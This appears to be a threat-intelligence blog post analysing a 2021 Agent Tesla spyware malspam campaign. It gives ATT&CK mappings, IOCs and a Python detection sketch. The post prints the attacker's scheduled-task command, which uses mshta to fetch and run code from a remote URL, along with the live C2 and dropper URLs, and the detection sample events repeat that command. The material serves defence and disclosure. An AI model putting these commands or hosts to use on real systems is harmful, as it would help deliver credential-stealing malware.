
Emerging Threats

Agent Tesla — December 6, 2021 malware campaign

u145 · 2 min read

Agent Tesla is a spyware that exfiltrates information from victim systems by capturing keystrokes and user actions (T1056.001 — Keylogging). Built on the .NET framework, it transmits stolen data to a command-and-control (C2) server. Agent Tesla extracts credentials and stored data from web browsers, email clients, and FTP clients (T1555.003 — Credentials from Web Browsers, T1552.001 — Credentials in Files). The malware bundles antivirus evasion and persistence mechanisms, ensuring it survives a system reboot.

In recent days we observed a new malspam campaign delivering this family. The lure email instructs the recipient to download and open the attached document.

The attached .doc file leverages mshta.exe (T1218.005 — Mshta) to fetch the URL https://bitly[.]com/asdqwdwdsfvcxvccv, which serves the following HTML redirect:

<html>
<head><title>Bitly</title></head>
<body><a href="https://sqlserviceazure.blogspot[.]com/p/bathindasboba[.]html">moved here</a></body>
</html>

After several staged downloads, a scheduled task is created via the following command (T1053.005 — Scheduled Task):

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""Bluefibonashi"" /F /tr """"\""""MsHtA""""\""""http://1230948%1230948@sqlserverserviceagent.blogspot.com/p/justtheback.html\""""

Concurrently, the Agent Tesla payload is downloaded and executed via PowerShell (T1059.001 — PowerShell). The implant then beacons to its C2 by issuing HTTP POST requests to http://microsoftazyresql.duckdns.org/j/p29oa/mawa/eae7bc3b675ad7042607.php (T1071.001 — Web Protocols).
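As an added example (not part of the original post), the following Python sketches how the delivery chain described above could be surfaced from process-creation telemetry. The records and field names are constructed to mirror the chain in this write-up and are assumptions, not a particular EDR's schema or real captured events.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style process-creation records modelled on the chain
# described above (Word -> mshta -> schtasks/powershell). Illustrative only.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "WINWORD.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe https://bitly.com/asdqwdwdsfvcxvccv"},
    {"parent": "mshta.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks.exe /create /sc MINUTE /mo 80 /tn "Bluefibonashi" /F '
                '/tr "MsHtA http://1230948%1230948@sqlserverserviceagent.blogspot.com/p/justtheback.html"'},
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -Command <stage download, elided>"},
    {"parent": "explorer.exe", "image": "schtasks.exe",      # benign control record
     "cmdline": 'schtasks.exe /query /tn "NightlyBackup"'},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBINS = {"mshta.exe", "powershell.exe", "wscript.exe", "cmd.exe"}
# schtasks /create ... /tr "<something> mshta ..." : a task whose action is mshta
SCHED_MSHTA = re.compile(r"/create\b.*?/tr\b.*?mshta", re.IGNORECASE)
# http://<userinfo>@host : the userinfo trick seen in the task's URL above
URL_USERINFO = re.compile(r"https?://[^/\s@]+@", re.IGNORECASE)

def classify(event: Dict[str, str]) -> List[str]:
    """Return the ATT&CK-tagged rules an event trips (empty list if nothing fires)."""
    parent, image = event["parent"].lower(), event["image"].lower()
    cmd = event["cmdline"]
    hits: List[str] = []
    if parent in OFFICE and image in LOLBINS:
        hits.append("office-spawned LOLBin (T1218.005 / T1059.001)")
    if image == "schtasks.exe" and SCHED_MSHTA.search(cmd):
        hits.append("scheduled task launching mshta (T1053.005)")
    if parent == "mshta.exe" and image in LOLBINS | {"schtasks.exe"}:
        hits.append("mshta spawning a further stage (T1218.005)")
    if URL_USERINFO.search(cmd):
        hits.append("URL with embedded userinfo (host obfuscation)")
    return hits

def triage(events: List[Dict[str, str]]) -> List[Tuple[str, List[str]]]:
    """Keep only events that trip at least one rule, with the rules that fired."""
    return [(e["image"], classify(e)) for e in events if classify(e)]

if __name__ == "__main__":
    for image, rules in triage(SAMPLE_EVENTS):
        print(image, "->", "; ".join(rules))
```

The benign `schtasks /query` record is there to show the rules key on `/create` plus an mshta action, not on schtasks alone.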

Agent Tesla is, at its core, a keylogger and data stealer: credentials harvested from major browsers, configuration files, and credentials for VPN clients, FTP clients, and mail clients are systematically targeted. Tracking the C2 infrastructure, malspam lures, and operator tradecraft for commodity stealers like Agent Tesla is the daily work of our Cyber Threat Intelligence.

IOC

DOC file:

  • Filename invoice#6317236-booking.com,pdf.doc
  • MD5 d74f268b986fecfa03b81029dd134811
  • SHA1 d49848ac2888e080883a427ef18b406fdcab6b9b
  • SHA256 81fcb3dce45b041a91b0c0e01c27e032d7e8d26217d4b6d669ce258b491a830d

Domains:

  • C2
    • microsoftazyresql.duckdns[.]org
    • 103.147.185[.]68
  • Dropper
    • bitly[.]com
    • 67.199.248[.]14

Commodity .NET stealers reach victims through living-off-the-land binaries — mshta, schtasks, powershell — chained behind a single weaponised office document; defence against this delivery chain rests on telemetry over signatures.
